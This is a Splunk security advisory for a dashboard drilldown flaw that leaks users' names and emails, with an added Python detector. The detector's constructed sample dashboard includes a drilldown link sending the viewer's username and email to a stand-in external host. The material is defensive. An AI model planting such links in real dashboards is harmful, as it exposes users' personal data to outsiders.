
Information disclosure via the dashboard drilldown in Splunk Enterprise

Advisory ID: SVD-2022-0802

Published: 2022-08-16

CVSSv3.1 Score: 2.6, Low

CWE: CWE-200

CVE ID: CVE-2022-37438

Last Update: 2022-08-16

CVSSv3.1 Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N

Bug ID: SPL-221531

Security Content: Splunk account discovery drilldown dashboard disclosure

Description

In the Splunk Enterprise versions listed in the Product Status table below, an authenticated user can craft a dashboard that, when another user visits it, could leak information about Splunk users (for example, username, email, and real name) through the drilldown component. Exploiting the vulnerability requires user access to create and share dashboards using Splunk Web.


Solution

For Splunk Enterprise, upgrade to version 8.1.11, 8.2.7.1, 9.0.1, or higher.

For Splunk Cloud Platform customers, Splunk is actively patching and monitoring Splunk Cloud instances.


Product Status

Product               | Version | Component  | Affected Version     | Fixed Version
----------------------|---------|------------|----------------------|--------------
Splunk Enterprise     | 8.1     | Splunk Web | 8.1.10 and lower     | 8.1.11
Splunk Enterprise     | 8.2     | Splunk Web | 8.2.0 to 8.2.7       | 8.2.7.1
Splunk Enterprise     | 9.0     | Splunk Web | 9.0.0                | 9.0.1
Splunk Cloud Platform | -       | Splunk Web | 8.2.2203.4 and lower | 9.0.2205


Mitigations and Workarounds

You can mitigate this vulnerability by configuring permissions for dashboards and the knowledge objects that drive them.


Detection

Splunk account discovery drilldown dashboard disclosure

This search uses REST functionality to query for dashboards whose drilldown URL options contain environment variables that could leak information about Splunk users. If an analyst sees results from this search, we suggest investigating to determine whether the disclosure of these environment variables was intended.
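As an added illustration of that detection logic (not Splunk's own search or code), the following Python checker parses Simple XML dashboard definitions offline and flags drilldown links whose URL embeds user environment tokens. It assumes the dashboard XML has already been retrieved (for example from the eai:data field returned by the data/ui/views REST endpoint) and that the token names $env:user$, $env:user_email$ and $env:user_realname$ are the ones of interest; the sample dashboards are constructed.

```python
"""Offline check for drilldown links that forward details about the
viewing user. Dashboard XML is assumed to have been fetched already
(e.g. from the eai:data field of the data/ui/views REST endpoint)."""
import re
import xml.etree.ElementTree as ET

# Environment tokens that resolve to details about the user viewing the
# dashboard (assumed token names, see lead-in).
TOKEN_RE = re.compile(r"\$env:user(?:_email|_realname)?\$")


def find_leaky_drilldowns(dashboard_xml):
    """Return [(url, [tokens])] for every <link> under a <drilldown>
    element whose target URL embeds a user environment token."""
    root = ET.fromstring(dashboard_xml)
    findings = []
    for drilldown in root.iter("drilldown"):
        for link in drilldown.iter("link"):  # includes links nested in <condition>
            url = (link.text or "").strip()
            tokens = sorted(set(TOKEN_RE.findall(url)))
            if tokens:
                findings.append((url, tokens))
    return findings


def scan_dashboards(dashboards):
    """dashboards: {name: xml}. Returns {name: findings} for the ones to review."""
    flagged = {}
    for name, xml in dashboards.items():
        findings = find_leaky_drilldowns(xml)
        if findings:
            flagged[name] = findings
    return flagged


# Constructed samples: a benign drilldown into a search, and one whose
# drilldown passes the viewer's identity to an external host via URL options.
SAFE_DASHBOARD = """<dashboard><row><panel><table>
  <search><query>index=_internal | stats count by sourcetype</query></search>
  <drilldown><link target="_blank">search?q=sourcetype%3D$click.value$</link></drilldown>
</table></panel></row></dashboard>"""

LEAKY_DASHBOARD = """<dashboard><row><panel><table>
  <search><query>index=_internal | stats count by sourcetype</query></search>
  <drilldown>
    <link target="_blank">https://example.invalid/lookup?u=$env:user$&amp;e=$env:user_email$</link>
  </drilldown>
</table></panel></row></dashboard>"""

if __name__ == "__main__":
    for name, hits in scan_dashboards({"safe": SAFE_DASHBOARD, "leaky": LEAKY_DASHBOARD}).items():
        print(name, hits)
```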


Severity

Splunk rates the severity as Low, 2.6, with the vector CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N. If Splunk Web is disabled on the Splunk Enterprise instance, the instance is not affected and the vulnerability is informational.


Acknowledgments

Eric LaMothe at Splunk